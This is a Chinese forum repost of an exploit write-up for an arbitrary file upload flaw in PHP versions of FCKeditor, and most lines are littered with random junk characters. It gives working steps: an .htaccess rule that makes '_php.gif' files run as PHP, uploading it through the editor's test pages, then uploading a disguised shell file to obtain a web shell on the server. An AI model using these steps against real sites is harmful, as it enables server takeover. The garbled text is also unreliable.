FCKeditor所有php版本Upload上传漏洞; u: f9 \' A2 V" V
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
: n( [0 y* W" K; X5 N, p减小字体 增大字体# l' `1 O% S* W' g0 q
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
1 [( b& y1 m( R3 h* z2 _( H! G[+] Date: 20110 J7 ^& W0 K* |; N+ [- ^/ l
[+] Author : sinesafe.cn3 g. W8 ?* t) C6 Y+ d: m1 r
[+] Website : WwW.sinesafe.cn
$ Q) S7 G( ~0 Z- g h: d5 G; m4 l0 g———————————————————
% b& ?1 d: k8 k/ r: O3 m1.create a htaccess file:
) h9 Q# ], {. l8 ?& Mcode:
) z, N# v# i, X; _6 c9 L<FilesMatch “_php.gif”>9 G+ D$ h0 b/ M3 ^- H
SetHandler application/x-httpd-php
3 i' M1 ~) |9 O7 ~4 {; r8 x</FilesMatch>% e+ \3 p5 }8 r0 f" e( Q) d/ i) ^
@& p1 s: E, H7 \2.Now upload this htaccess with FCKeditor.
- V: Q" {5 C7 j5 {- F0 L# Z4 u: |) [. t# d0 N) I1 E3 D; R
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
% V6 M1 e w% m1 f, H6 ^0 q* s8 E* Y7 X% i" J/ z
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html* Q, Y! x( S- N6 O' V- A0 C+ J
6 J+ ?! t: z/ ^1 F
———————————————————————————————-5 e" u1 Z, e0 R+ X$ d
3.Now upload shell.php.gif with FCKeditor.
2 z& c7 N2 f1 \# h4 P; d5 ~4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.# {" S- K3 h8 Y: m
5.http://www.sinesafe.cn/anything/shell_php.gif" F) @9 O; v1 O4 m' o0 ~) t
6.Now shell is available from server. |
" B0 L! X6 s, P# e. [
" c( U$ B, k" U- d
7 O1 Y3 R" a) ~
|
发表于 2013-10-27 17:25:21
收藏
支持
反对